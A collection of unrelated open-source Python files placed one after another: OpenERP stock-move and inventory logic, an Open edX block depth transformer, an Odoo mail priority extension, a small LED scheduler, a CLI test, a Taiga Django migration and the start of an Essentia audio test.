                    'state': move.state,
                    'location_id': location_id or move.location_id.id,
                }
                current_move = self.copy(cr, uid, move.id, default_val)
                res += [current_move]
                update_val = {}
                update_val['product_qty'] = quantity_rest
                update_val['product_uos_qty'] = uos_qty_rest
                self.write(cr, uid, [move.id], update_val)

            else:
                quantity_rest = quantity
                uos_qty_rest =  uos_qty
                res += [move.id]
                update_val = {
                        'product_qty' : quantity_rest,
                        'product_uos_qty' : uos_qty_rest,
                        'location_id': location_id or move.location_id.id,
                }
                self.write(cr, uid, [move.id], update_val)

        self.action_done(cr, uid, res, context=context)

        return res

    # FIXME: needs refactoring, this code is partially duplicated in stock_picking.do_partial()!
    def do_partial(self, cr, uid, ids, partial_datas, context=None):
        """ Makes partial pickings and moves done.
        @param partial_datas: Dictionary containing details of partial picking
                          like partner_id, delivery_date, delivery
                          moves with product_id, product_qty, uom
        """
        res = {}
        picking_obj = self.pool.get('stock.picking')
        product_obj = self.pool.get('product.product')
        currency_obj = self.pool.get('res.currency')
        uom_obj = self.pool.get('product.uom')
        wf_service = netsvc.LocalService("workflow")

        if context is None:
            context = {}

        complete, too_many, too_few = [], [], []
        move_product_qty = {}
        prodlot_ids = {}
        for move in self.browse(cr, uid, ids, context=context):
            if move.state in ('done', 'cancel'):
                continue
            partial_data = partial_datas.get('move%s'%(move.id), False)
            assert partial_data, _('Missing partial picking data for move #%s.') % (move.id)
            product_qty = partial_data.get('product_qty',0.0)
            move_product_qty[move.id] = product_qty
            product_uom = partial_data.get('product_uom',False)
            product_price = partial_data.get('product_price',0.0)
            product_currency = partial_data.get('product_currency',False)
            prodlot_ids[move.id] = partial_data.get('prodlot_id')
            if move.product_qty == product_qty:
                complete.append(move)
            elif move.product_qty > product_qty:
                too_few.append(move)
            else:
                too_many.append(move)

            # Average price computation
            if (move.picking_id.type == 'in') and (move.product_id.cost_method == 'average'):
                product = product_obj.browse(cr, uid, move.product_id.id)
                move_currency_id = move.company_id.currency_id.id
                context['currency_id'] = move_currency_id
                qty = uom_obj._compute_qty(cr, uid, product_uom, product_qty, product.uom_id.id)
                if qty > 0:
                    new_price = currency_obj.compute(cr, uid, product_currency,
                            move_currency_id, product_price, round=False)
                    new_price = uom_obj._compute_price(cr, uid, product_uom, new_price,
                            product.uom_id.id)
                    if product.qty_available <= 0:
                        new_std_price = new_price
                    else:
                        # Get the standard price
                        amount_unit = product.price_get('standard_price', context=context)[product.id]
                        new_std_price = ((amount_unit * product.qty_available)\
                            + (new_price * qty))/(product.qty_available + qty)

                    product_obj.write(cr, uid, [product.id],{'standard_price': new_std_price})

                    # Record the values that were chosen in the wizard, so they can be
                    # used for inventory valuation if real-time valuation is enabled.
                    self.write(cr, uid, [move.id],
                                {'price_unit': product_price,
                                 'price_currency_id': product_currency,
                                })

        for move in too_few:
            product_qty = move_product_qty[move.id]
            if product_qty != 0:
                defaults = {
                            'product_qty' : product_qty,
                            'product_uos_qty': product_qty,
                            'picking_id' : move.picking_id.id,
                            'state': 'assigned',
                            'move_dest_id': False,
                            'price_unit': move.price_unit,
                            }
                prodlot_id = prodlot_ids[move.id]
                if prodlot_id:
                    defaults.update(prodlot_id=prodlot_id)
                new_move = self.copy(cr, uid, move.id, defaults)
                complete.append(self.browse(cr, uid, new_move))
            self.write(cr, uid, [move.id],
                    {
                        'product_qty': move.product_qty - product_qty,
                        'product_uos_qty': move.product_qty - product_qty,
                        'prodlot_id': False,
                        'tracking_id': False,
                    })


        for move in too_many:
            self.write(cr, uid, [move.id],
                    {
                        'product_qty': move.product_qty,
                        'product_uos_qty': move.product_qty,
                    })
            complete.append(move)

        for move in complete:
            if prodlot_ids.get(move.id):
                self.write(cr, uid, [move.id],{'prodlot_id': prodlot_ids.get(move.id)})
            self.action_done(cr, uid, [move.id], context=context)
            if  move.picking_id.id :
                # TOCHECK : Done picking if all moves are done
                cr.execute("""
                    SELECT move.id FROM stock_picking pick
                    RIGHT JOIN stock_move move ON move.picking_id = pick.id AND move.state = %s
                    WHERE pick.id = %s""",
                            ('done', move.picking_id.id))
                res = cr.fetchall()
                if len(res) == len(move.picking_id.move_lines):
                    picking_obj.action_move(cr, uid, [move.picking_id.id])
                    wf_service.trg_validate(uid, 'stock.picking', move.picking_id.id, 'button_done', cr)

        return [move.id for move in complete]

stock_move()

class stock_inventory(osv.osv):
    _name = "stock.inventory"
    _description = "Inventory"
    _columns = {
        'name': fields.char('Inventory Reference', size=64, required=True, readonly=True, states={'draft': [('readonly', False)]}),
        'date': fields.datetime('Creation Date', required=True, readonly=True, states={'draft': [('readonly', False)]}),
        'date_done': fields.datetime('Date done'),
        'inventory_line_id': fields.one2many('stock.inventory.line', 'inventory_id', 'Inventories', readonly=True, states={'draft': [('readonly', False)]}),
        'move_ids': fields.many2many('stock.move', 'stock_inventory_move_rel', 'inventory_id', 'move_id', 'Created Moves'),
        'state': fields.selection( (('draft', 'Draft'), ('cancel','Cancelled'), ('confirm','Confirmed'), ('done', 'Done')), 'Status', readonly=True, select=True),
        'company_id': fields.many2one('res.company', 'Company', required=True, select=True, readonly=True, states={'draft':[('readonly',False)]}),

    }
    _defaults = {
        'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
        'state': 'draft',
        'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.inventory', context=c)
    }

    def copy(self, cr, uid, id, default=None, context=None):
        if default is None:
            default = {}
        default = default.copy()
        default.update({'move_ids': [], 'date_done': False})
        return super(stock_inventory, self).copy(cr, uid, id, default, context=context)

    def _inventory_line_hook(self, cr, uid, inventory_line, move_vals):
        """ Creates a stock move from an inventory line
        @param inventory_line:
        @param move_vals:
        @return:
        """
        return self.pool.get('stock.move').create(cr, uid, move_vals)

    def action_done(self, cr, uid, ids, context=None):
        """ Finish the inventory
        @return: True
        """
        if context is None:
            context = {}
        move_obj = self.pool.get('stock.move')
        for inv in self.browse(cr, uid, ids, context=context):
            move_obj.action_done(cr, uid, [x.id for x in inv.move_ids], context=context)
            self.write(cr, uid, [inv.id], {'state':'done', 'date_done': time.strftime('%Y-%m-%d %H:%M:%S')}, context=context)
        return True

    def action_confirm(self, cr, uid, ids, context=None):
        """ Confirm the inventory and writes its finished date
        @return: True
        """
        if context is None:
            context = {}
        # to perform the correct inventory corrections we need analyze stock location by
        # location, never recursively, so we use a special context
        product_context = dict(context, compute_child=False)

        location_obj = self.pool.get('stock.location')
        for inv in self.browse(cr, uid, ids, context=context):
            move_ids = []
            for line in inv.inventory_line_id:
                pid = line.product_id.id
                product_context.update(uom=line.product_uom.id, to_date=inv.date, date=inv.date, prodlot_id=line.prod_lot_id.id)
                amount = location_obj._product_get(cr, uid, line.location_id.id, [pid], product_context)[pid]
                change = line.product_qty - amount
                lot_id = line.prod_lot_id.id
                if change:
                    location_id = line.product_id.property_stock_inventory.id
                    value = {
                        'name': _('INV:') + (line.inventory_id.name or ''),
                        'product_id': line.product_id.id,
                        'product_uom': line.product_uom.id,
                        'prodlot_id': lot_id,
                        'date': inv.date,
                    }

                    if change > 0:
                        value.update( {
                            'product_qty': change,
                            'location_id': location_id,
                            'location_dest_id': line.location_id.id,
                        })
                    else:
                        value.update( {
                            'product_qty': -change,
                            'location_id': line.location_id.id,
                            'location_dest_id': location_id,
                        })
                    move_ids.append(self._inventory_line_hook(cr, uid, line, value))
            self.write(cr, uid, [inv.id], {'state': 'confirm', 'move_ids': [(6, 0, move_ids)]})
            self.pool.get('stock.move').action_confirm(cr, uid, move_ids, context=context)
        return True

    def action_cancel_draft(self, cr, uid, ids, context=None):
        """ Cancels the stock move and change inventory state to draft.
        @return: True
        """
        for inv in self.browse(cr, uid, ids, context=context):
            self.pool.get('stock.move').action_cancel(cr, uid, [x.id for x in inv.move_ids], context=context)
            self.write(cr, uid, [inv.id], {'state':'draft'}, context=context)
        return True

    def action_cancel_inventory(self, cr, uid, ids, context=None):
        """ Cancels both stock move and inventory
        @return: True
        """
        move_obj = self.pool.get('stock.move')
        account_move_obj = self.pool.get('account.move')
        for inv in self.browse(cr, uid, ids, context=context):
            move_obj.action_cancel(cr, uid, [x.id for x in inv.move_ids], context=context)
            for move in inv.move_ids:
                 account_move_ids = account_move_obj.search(cr, uid, [('name', '=', move.name)])
                 if account_move_ids:
                     account_move_data_l = account_move_obj.read(cr, uid, account_move_ids, ['state'], context=context)
                     for account_move in account_move_data_l:
                         if account_move['state'] == 'posted':
                             raise osv.except_osv(_('User Error!'),
                                                  _('In order to cancel this inventory, you must first unpost related journal entries.'))
                         account_move_obj.unlink(cr, uid, [account_move['id']], context=context)
            self.write(cr, uid, [inv.id], {'state': 'cancel'}, context=context)
        return True

stock_inventory()

class stock_inventory_line(osv.osv):
    _name = "stock.inventory.line"
    _description = "Inventory Line"
    _rec_name = "inventory_id"
    _columns = {
        'inventory_id': fields.many2one('stock.inventory', 'Inventory', ondelete='cascade', select=True),
        'location_id': fields.many2one('stock.location', 'Location', required=True),
        'product_id': fields.many2one('product.product', 'Product', required=True, select=True),
        'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True),
        'product_qty': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure')),
        'company_id': fields.related('inventory_id','company_id',type='many2one',relation='res.company',string='Company',store=True, select=True, readonly=True),
        'prod_lot_id': fields.many2one('stock.production.lot', 'Serial Number', domain="[('product_id','=',product_id)]"),
        'state': fields.related('inventory_id','state',type='char',string='Status',readonly=True),
    }

    def _default_stock_location(self, cr, uid, context=None):
        try:
            location_model, location_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_stock')
            with tools.mute_logger('openerp.osv.orm'):
                self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
        except (orm.except_orm, ValueError):
            location_id = False
        return location_id

    _defaults = {
        'location_id': _default_stock_location
    }

    def on_change_product_id(self, cr, uid, ids, location_id, product, uom=False, to_date=False):
        """ Changes UoM and name if product_id changes.
        @param location_id: Location id
        @param product: Changed product_id
        @param uom: UoM product
        @return:  Dictionary of changed values
        """
        if not product:
            return {'value': {'product_qty': 0.0, 'product_uom': False, 'prod_lot_id': False}}
        obj_product = self.pool.get('product.product').browse(cr, uid, product)
        uom = uom or obj_product.uom_id.id
        amount = self.pool.get('stock.location')._product_get(cr, uid, location_id, [product], {'uom': uom, 'to_date': to_date, 'compute_child': False})[product]
        result = {'product_qty': amount, 'product_uom': uom, 'prod_lot_id': False}
        return {'value': result}

stock_inventory_line()

#----------------------------------------------------------
# Stock Warehouse
#----------------------------------------------------------
class stock_warehouse(osv.osv):
    _name = "stock.warehouse"
    _description = "Warehouse"
    _columns = {
        'name': fields.char('Name', size=128, required=True, select=True),
        'company_id': fields.many2one('res.company', 'Company', required=True, select=True),
        'partner_id': fields.many2one('res.partner', 'Owner Address'),
        'lot_input_id': fields.many2one('stock.location', 'Location Input', required=True, domain=[('usage','<>','view')]),
        'lot_stock_id': fields.many2one('stock.location', 'Location Stock', required=True, domain=[('usage','=','internal')]),
        'lot_output_id': fields.many2one('stock.location', 'Location Output', required=True, domain=[('usage','<>','view')]),
    }

    def _default_lot_input_stock_id(self, cr, uid, context=None):
        try:
            lot_input_stock_model, lot_input_stock_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_stock')
            with tools.mute_logger('openerp.osv.orm'):
                self.pool.get('stock.location').check_access_rule(cr, uid, [lot_input_stock_id], 'read', context=context)
        except (ValueError, orm.except_orm):
            # the user does not have read access on the location or it does not exists
            lot_input_stock_id = False
        return lot_input_stock_id

    def _default_lot_output_id(self, cr, uid, context=None):
        try:
            lot_output_model, lot_output_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_output')
            with tools.mute_logger('openerp.osv.orm'):
                self.pool.get('stock.location').check_access_rule(cr, uid, [lot_output_id], 'read', context=context)
        except (ValueError, orm.except_orm):
            # the user does not have read access on the location or it does not exists
            lot_output_id = False
        return lot_output_id

    _defaults = {
        'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.inventory', context=c),
        'lot_input_id': _default_lot_input_stock_id,
        'lot_stock_id': _default_lot_input_stock_id,
        'lot_output_id': _default_lot_output_id,
    }

stock_warehouse()

#----------------------------------------------------------
# "Empty" Classes that are used to vary from the original stock.picking  (that are dedicated to the internal pickings)
#   in order to offer a different usability with different views, labels, available reports/wizards...
#----------------------------------------------------------
class stock_picking_in(osv.osv):
    _name = "stock.picking.in"
    _inherit = "stock.picking"
    _table = "stock_picking"
    _description = "Incoming Shipments"

    def search(self, cr, user, args, offset=0, limit=None, order=None, context=None, count=False):
        return self.pool.get('stock.picking').search(cr, user, args, offset, limit, order, context, count)

    def read(self, cr, uid, ids, fields=None, context=None, load='_classic_read'):
        return self.pool.get('stock.picking').read(cr, uid, ids, fields=fields, context=context, load=load)

    def check_access_rights(self, cr, uid, operation, raise_exception=True):
        #override in order to redirect the check of acces rights on the stock.picking object
        return self.pool.get('stock.picking').check_access_rights(cr, uid, operation, raise_exception=raise_exception)

    def check_access_rule(self, cr, uid, ids, operation, context=None):
        #override in order to redirect the check of acces rules on the stock.picking object
        return self.pool.get('stock.picking').check_access_rule(cr, uid, ids, operation, context=context)

    def _workflow_trigger(self, cr, uid, ids, trigger, context=None):
        #override in order to trigger the workflow of stock.picking at the end of create, write and unlink operation
        #instead of it's own workflow (which is not existing)
        return self.pool.get('stock.picking')._workflow_trigger(cr, uid, ids, trigger, context=context)

    def _workflow_signal(self, cr, uid, ids, signal, context=None):
        #override in order to fire the workflow signal on given stock.picking workflow instance
        #instead of it's own workflow (which is not existing)
        return self.pool.get('stock.picking')._workflow_signal(cr, uid, ids, signal, context=context)

    def message_post(self, *args, **kwargs):
        """Post the message on stock.picking to be able to see it in the form view when using the chatter"""
        return self.pool.get('stock.picking').message_post(*args, **kwargs)

    def message_subscribe(self, *args, **kwargs):
        """Send the subscribe action on stock.picking model as it uses _name in request"""
        return self.pool.get('stock.picking').message_subscribe(*args, **kwargs)

    def message_unsubscribe(self, *args, **kwargs):
        """Send the unsubscribe action on stock.picking model to match with subscribe"""
        return self.pool.get('stock.picking').message_unsubscribe(*args, **kwargs)

    def default_get(self, cr, uid, fields_list, context=None):
        # merge defaults from stock.picking with possible defaults defined on stock.picking.in
        defaults = self.pool['stock.picking'].default_get(cr, uid, fields_list, context=context)
        in_defaults = super(stock_picking_in, self).default_get(cr, uid, fields_list, context=context)
        defaults.update(in_defaults)
        return defaults

    _columns = {
        'backorder_id': fields.many2one('stock.picking.in', 'Back Order of', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="If this shipment was split, then this field links to the shipment which contains the already processed part.", select=True),
        'state': fields.selection(
            [('draft', 'Draft'),
            ('auto', 'Waiting Another Operation'),
            ('confirmed', 'Waiting Availability'),
            ('assigned', 'Ready to Receive'),
            ('done', 'Received'),
            ('cancel', 'Cancelled'),],
            'Status', readonly=True, select=True,
            help="""* Draft: not confirmed yet and will not be scheduled until confirmed\n
                 * Waiting Another Operation: waiting for another move to proceed before it becomes automatically available (e.g. in Make-To-Order flows)\n
                 * Waiting Availability: still waiting for the availability of products\n
                 * Ready to Receive: products reserved, simply waiting for confirmation.\n
                 * Received: has been processed, can't be modified or cancelled anymore\n
                 * Cancelled: has been cancelled, can't be confirmed anymore"""),
    }
    _defaults = {
        'type': 'in',
    }

class stock_picking_out(osv.osv):
    _name = "stock.picking.out"
    _inherit = "stock.picking"
    _table = "stock_picking"
    _description = "Delivery Orders"

    def search(self, cr, user, args, offset=0, limit=None, order=None, context=None, count=False):
        return self.pool.get('stock.picking').search(cr, user, args, offset, limit, order, context, count)

    def read(self, cr, uid, ids, fields=None, context=None, load='_classic_read'):
        return self.pool.get('stock.picking').read(cr, uid, ids, fields=fields, context=context, load=load)

    def check_access_rights(self, cr, uid, operation, raise_exception=True):
        #override in order to redirect the check of acces rights on the stock.picking object
        return self.pool.get('stock.picking').check_access_rights(cr, uid, operation, raise_exception=raise_exception)

    def check_access_rule(self, cr, uid, ids, operation, context=None):
        #override in order to redirect the check of acces rules on the stock.picking object
        return self.pool.get('stock.picking').check_access_rule(cr, uid, ids, operation, context=context)

    def _workflow_trigger(self, cr, uid, ids, trigger, context=None):
        #override in order to trigger the workflow of stock.picking at the end of create, write and unlink operation
        #instead of it's own workflow (which is not existing)
        return self.pool.get('stock.picking')._workflow_trigger(cr, uid, ids, trigger, context=context)

    def _workflow_signal(self, cr, uid, ids, signal, context=None):
        #override in order to fire the workflow signal on given stock.picking workflow instance
        #instead of it's own workflow (which is not existing)
        return self.pool.get('stock.picking')._workflow_signal(cr, uid, ids, signal, context=context)

    def message_post(self, *args, **kwargs):
        """Post the message on stock.picking to be able to see it in the form view when using the chatter"""
        return self.pool.get('stock.picking').message_post(*args, **kwargs)

    def message_subscribe(self, *args, **kwargs):
        """Send the subscribe action on stock.picking model as it uses _name in request"""
        return self.pool.get('stock.picking').message_subscribe(*args, **kwargs)

    def message_unsubscribe(self, *args, **kwargs):
        """Send the unsubscribe action on stock.picking model to match with subscribe"""
        return self.pool.get('stock.picking').message_unsubscribe(*args, **kwargs)

    def default_get(self, cr, uid, fields_list, context=None):
        # merge defaults from stock.picking with possible defaults defined on stock.picking.out
        defaults = self.pool['stock.picking'].default_get(cr, uid, fields_list, context=context)
        out_defaults = super(stock_picking_out, self).default_get(cr, uid, fields_list, context=context)
        defaults.update(out_defaults)
        return defaults

    _columns = {
        'backorder_id': fields.many2one('stock.picking.out', 'Back Order of', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="If this shipment was split, then this field links to the shipment which contains the already processed part.", select=True),
        'state': fields.selection(
            [('draft', 'Draft'),
            ('auto', 'Waiting Another Operation'),
            ('confirmed', 'Waiting Availability'),
            ('assigned', 'Ready to Deliver'),
            ('done', 'Delivered'),
            ('cancel', 'Cancelled'),],
            'Status', readonly=True, select=True,
            help="""* Draft: not confirmed yet and will not be scheduled until confirmed\n
                 * Waiting Another Operation: waiting for another move to proceed before it becomes automatically available (e.g. in Make-To-Order flows)\n
                 * Waiting Availability: still waiting for the availability of products\n
                 * Ready to Deliver: products reserved, simply waiting for confirmation.\n
                 * Delivered: has been processed, can't be modified or cancelled anymore\n
                 * Cancelled: has been cancelled, can't be confirmed anymore"""),
    }
    _defaults = {
        'type': 'out',
    }

# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:

from django import forms

# future use
"""
Block Depth Transformer
"""
from __future__ import absolute_import

from openedx.core.djangoapps.content.block_structure.transformer import BlockStructureTransformer


class BlockDepthTransformer(BlockStructureTransformer):
    """
    Keep track of the depth of each block within the block structure.  In case
    of multiple paths to a given node (in a DAG), use the shallowest depth.
    """
    WRITE_VERSION = 1
    READ_VERSION = 1
    BLOCK_DEPTH = 'block_depth'

    def __init__(self, requested_depth=None):
        self.requested_depth = requested_depth

    @classmethod
    def name(cls):
        return "blocks_api:block_depth"

    @classmethod
    def get_block_depth(cls, block_structure, block_key):
        """
        Return the precalculated depth of a block within the block_structure:

        Arguments:
            block_structure: a BlockStructure instance
            block_key: the key of the block whose depth we want to know

        Returns:
            int
        """
        return block_structure.get_transformer_block_field(
            block_key,
            cls,
            cls.BLOCK_DEPTH,
        )

    def transform(self, usage_info, block_structure):
        """
        Mutates block_structure based on the given usage_info.
        """
        for block_key in block_structure.topological_traversal():
            parents = block_structure.get_parents(block_key)
            if parents:
                block_depth = min(
                    self.get_block_depth(block_structure, parent_key)
                    for parent_key in parents
                ) + 1
            else:
                block_depth = 0
            block_structure.set_transformer_block_field(
                block_key,
                self,
                self.BLOCK_DEPTH,
                block_depth
            )

        if self.requested_depth is not None:
            block_structure.remove_block_traversal(
                lambda block_key: self.get_block_depth(block_structure, block_key) > self.requested_depth
            )

# Copyright 2018 ACSONE SA/NV
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import ast
from odoo import api, exceptions, models, _


class MailComposeMessage(models.TransientModel):
    _inherit = 'mail.compose.message'

    @api.model
    def _get_priorities(self):
        """
        Load priorities from parameters.
        :return: dict
        """
        key = 'mail.sending.job.priorities'
        try:
            priorities = ast.literal_eval(
                self.env['ir.config_parameter'].sudo().get_param(
                    key, default='{}'))
        # Catch exception to have a understandable error message
        except (ValueError, SyntaxError):
            raise exceptions.UserError(
                _("Error to load the system parameter (%s) "
                  "of priorities") % key)
        # As literal_eval can transform str into any format, check if we
        # have a real dict
        if not isinstance(priorities, dict):
            raise exceptions.UserError(
                _("Error to load the system parameter (%s) of priorities.\n"
                  "Invalid dictionary") % key)
        return priorities

    @api.multi
    def send_mail(self, auto_commit=False):
        """
        Set a priority on subsequent generated mail.mail, using priorities
        set into the configuration.
        :return: dict/action
        """
        active_ids = self.env.context.get('active_ids')
        default_priority = self.env.context.get('default_mail_job_priority')
        if active_ids and not default_priority:
            priorities = self._get_priorities()
            size = len(active_ids)
            limits = [lim for lim in priorities if lim <= size]
            if limits:
                prio = priorities.get(max(limits))
                self = self.with_context(default_mail_job_priority=prio)
        return super().send_mail(auto_commit=auto_commit)

# -*- encoding: utf-8 -*-
##############################################################################
#
#    res_partner
#    Copyright (c) 2013 Codeback Software S.L. (http://codeback.es)    
#    @author: Miguel García <miguel@codeback.es>
#    @author: Javier Fuentes <javier@codeback.es>
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

from osv import fields, osv
from datetime import datetime, timedelta
from openerp.tools.translate import _

class res_company(osv.osv):
    """añadimos los nuevos campos"""
    
    _name = "res.company"
    _inherit = "res.company"

    _columns = {   
        'web_discount': fields.float('Descuento web (%)'),
    }

# Copyright (c) 2016 Sebastian Kanis
# This file is part of pi-led-control.

# pi-led-control is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

# pi-led-control is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with pi-led-control.  If not, see <http://www.gnu.org/licenses/>.

import datetime
import logging

from server.programs.abstractprogram import AbstractProgram


class ScheduledProgram(AbstractProgram):
    def __init__(self, program, timeOfDay):
        super().__init__()
        self._program = program
        self._timeOfDay = timeOfDay

    def run(self):
        now = datetime.datetime.now()
        secondsInCurrentDay = now.hour * 3600 + now.minute * 60 + now.second
        if secondsInCurrentDay < self._timeOfDay:
            sleepDuration = self._timeOfDay - secondsInCurrentDay
        else:
            sleepDuration = self._timeOfDay + 3600 * 24 - secondsInCurrentDay
        logging.getLogger("main").info("sleeping for " + str(sleepDuration) + " seconds")
        self._waitIfNotStopped(sleepDuration)
        self._program.run()

    def setThreadStopEvent(self, threadStopEvent):
        self.threadStopEvent = threadStopEvent
        self._program.setThreadStopEvent(threadStopEvent)

    def setColorSetter(self, colorSetter):
        self._colorSetter = colorSetter
        self._program.setColorSetter(colorSetter)

    def getCurrentColor(self):
        return self._program.getCurrentColor()

    def setLastColor(self, lastColor):
        self._program.setLastColor(lastColor)

from pathlib import Path

from inxs.cli import main as _main

from tests import equal_documents


def main(*args):
    _args = ()
    for arg in args:
        if isinstance(arg, Path):
            _args += (str(arg),)
        else:
            _args += (arg,)
    _main(_args)


# TODO case-study with this use-case
def test_mods_to_tei(datadir):
    main("--inplace", datadir / "mods_to_tei.py", datadir / "mods_to_tei.xml")
    assert equal_documents(datadir / "mods_to_tei.xml", datadir / "mods_to_tei_exp.xml")

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations
from django.conf import settings
import django_pgjson.fields
import django.utils.timezone
import django.db.models.deletion
import djorm_pgarray.fields
import taiga.projects.history.models


class Migration(migrations.Migration):

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('users', '0002_auto_20140903_0916'),
    ]

    operations = [
        migrations.CreateModel(
            name='Membership',
            fields=[
                ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
                ('is_owner', models.BooleanField(default=False)),
                ('email', models.EmailField(max_length=255, null=True, default=None, verbose_name='email', blank=True)),
                ('created_at', models.DateTimeField(default=django.utils.timezone.now, verbose_name='creado el')),
                ('token', models.CharField(max_length=60, null=True, default=None, verbose_name='token', blank=True)),
                ('invited_by_id', models.IntegerField(null=True, blank=True)),
            ],
            options={
                'ordering': ['project', 'user__full_name', 'user__username', 'user__email', 'email'],
                'verbose_name_plural': 'membershipss',
                'permissions': (('view_membership', 'Can view membership'),),
                'verbose_name': 'membership',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Project',
            fields=[
                ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
                ('tags', djorm_pgarray.fields.TextArrayField(dbtype='text', verbose_name='tags')),
                ('name', models.CharField(max_length=250, unique=True, verbose_name='name')),
                ('slug', models.SlugField(max_length=250, unique=True, verbose_name='slug', blank=True)),
                ('description', models.TextField(verbose_name='description')),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now, verbose_name='created date')),
                ('modified_date', models.DateTimeField(verbose_name='modified date')),
                ('total_milestones', models.IntegerField(null=True, default=0, verbose_name='total of milestones', blank=True)),
                ('total_story_points', models.FloatField(default=0, verbose_name='total story points')),
                ('is_backlog_activated', models.BooleanField(default=True, verbose_name='active backlog panel')),
                ('is_kanban_activated', models.BooleanField(default=False, verbose_name='active kanban panel')),
                ('is_wiki_activated', models.BooleanField(default=True, verbose_name='active wiki panel')),
                ('is_issues_activated', models.BooleanField(default=True, verbose_name='active issues panel')),
                ('videoconferences', models.CharField(max_length=250, null=True, choices=[('appear-in', 'AppearIn'), ('talky', 'Talky'), ('jitsi', 'Jitsi')], verbose_name='videoconference system', blank=True)),
                ('videoconferences_salt', models.CharField(max_length=250, null=True, verbose_name='videoconference room salt', blank=True)),
                ('anon_permissions', djorm_pgarray.fields.TextArrayField(choices=[('view_project', 'View project'), ('view_milestones', 'View milestones'), ('view_us', 'View user stories'), ('view_tasks', 'View tasks'), ('view_issues', 'View issues'), ('view_wiki_pages', 'View wiki pages'), ('view_wiki_links', 'View wiki links')], dbtype='text', default=[], verbose_name='anonymous permissions')),
                ('public_permissions', djorm_pgarray.fields.TextArrayField(choices=[('view_project', 'View project'), ('view_milestones', 'View milestones'), ('view_us', 'View user stories'), ('view_issues', 'View issues'), ('vote_issues', 'Vote issues'), ('view_tasks', 'View tasks'), ('view_wiki_pages', 'View wiki pages'), ('view_wiki_links', 'View wiki links'), ('request_membership', 'Request membership'), ('add_us_to_project', 'Add user story to project'), ('add_comments_to_us', 'Add comments to user stories'), ('add_comments_to_task', 'Add comments to tasks'), ('add_issue', 'Add issues'), ('add_comments_issue', 'Add comments to issues'), ('add_wiki_page', 'Add wiki page'), ('modify_wiki_page', 'Modify wiki page'), ('add_wiki_link', 'Add wiki link'), ('modify_wiki_link', 'Modify wiki link')], dbtype='text', default=[], verbose_name='user permissions')),
                ('is_private', models.BooleanField(default=False, verbose_name='is private')),
                ('tags_colors', djorm_pgarray.fields.TextArrayField(dbtype='text', dimension=2, default=[], null=False, verbose_name='tags colors')),
            ],
            options={
                'ordering': ['name'],
                'verbose_name_plural': 'projects',
                'permissions': (('view_project', 'Can view project'),),
                'verbose_name': 'project',
            },
            bases=(models.Model,),
        ),
        migrations.AddField(
            model_name='project',
            name='members',
            field=models.ManyToManyField(to=settings.AUTH_USER_MODEL, related_name='projects', verbose_name='members', through='projects.Membership'),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='project',
            name='owner',
            field=models.ForeignKey(to=settings.AUTH_USER_MODEL, related_name='owned_projects', verbose_name='owner'),
            preserve_default=True,
        ),

        migrations.AddField(
            model_name='membership',
            name='user',
            field=models.ForeignKey(blank=True, default=None, to=settings.AUTH_USER_MODEL, null=True, related_name='memberships'),
            preserve_default=True,
        ),

        migrations.AddField(
            model_name='membership',
            name='project',
            field=models.ForeignKey(default=1, to='projects.Project', related_name='memberships'),
            preserve_default=False,
        ),

        migrations.AlterUniqueTogether(
            name='membership',
            unique_together=set([('user', 'project')]),
        ),

        migrations.AddField(
            model_name='membership',
            name='role',
            field=models.ForeignKey(related_name='memberships', to='users.Role', default=1),
            preserve_default=False,
        ),
    ]

#!/usr/bin/env python

# Copyright (C) 2006-2016  Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
# details.
#
# You should have received a copy of the Affero GNU General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/



from essentia_test import *

class TestHPCP(TestCase):

    def testEmpty(self):
        hpcp = HPCP()([], [])
        self.assertEqualVector(hpcp, [0.]*12)

    def testZeros(self):
        hpcp = HPCP()([0]*10, [0]*10)
        self.assertEqualVector(hpcp, [0.]*12)

    def testSin440(self):
        # Tests whether a real audio signal of one pure tone gets read as a
        # single semitone activation, and gets read into the right pcp bin
        sampleRate = 44100
